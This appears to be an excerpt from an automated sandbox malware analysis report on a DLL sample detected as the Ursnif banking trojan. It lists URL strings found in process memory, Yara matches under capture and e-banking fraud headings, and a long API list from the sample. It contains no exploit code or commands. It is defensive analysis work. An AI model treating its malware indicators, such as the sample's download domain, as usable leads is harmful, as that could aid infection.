                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
                Source: loaddll32.exe, 00000000.00000002.891686780.000000001008B000.00000002.00020000.sdmpString found in binary or memory: http://www.xnview.comJ
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
                Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
                Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000018.00000002.885836354.000001D7BBF22000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: control.exe PID: 6752, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY
                Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_1007F8B0 EntryPoint,LoadIconW,CreateMenu,CloseFigure,GetDoubleClickTime,CharUpperW,GetMessageExtraInfo,OpenIcon,GetMenuItemCount,EndDoc,IsIconic,GetWindowContextHelpId,GetClipboardData,StrokePath,UnrealizeObject,GetMapMode,IsCharAlphaA,FlattenPath,EnumClipboardFormats,GetSysColorBrush,DestroyMenu,GetDCBrushColor,UpdateColors,GetColorSpace,CharNextA,GetQueueStatus,GetPolyFillMode,DestroyWindow,IsCharLowerA,SetMetaRgn,GetObjectType,EndPath,GetObjectType,IsCharAlphaW,OemKeyScan,CloseMetaFile,GetSysColorBrush,LoadCursorFromFileA,GetPixelFormat,SwapBuffers,UnrealizeObject,GetGraphicsMode,GetGraphicsMode,GetMapMode,UnrealizeObject,FlattenPath,GetMessagePos,GetTopWindow,PathToRegion,CloseWindow,GetDlgCtrlID,GetStretchBltMode,GetProcessWindowStation,CancelDC,CharLowerA,GetThreadDesktop,VkKeyScanW,CreatePatternBrush,DeleteColorSpace,IsWindowUnicode,WindowFromDC,GetKeyState,IsCharLowerA,CreateHalftonePalette,GetClipboardSequenceNumber,PathToRegion,GetMenuCheckMarkDimensions,LoadIconA,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextCharset,GetTextChars
                Source: Yara matchFile source: https___purefile24.top_4352wedfoifom.dll, type: SAMPLE
                Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
                Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE

                E-Banking Fraud:

                barindex
                Yara detected UrsnifShow sources
                Source: Yara matchFile source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
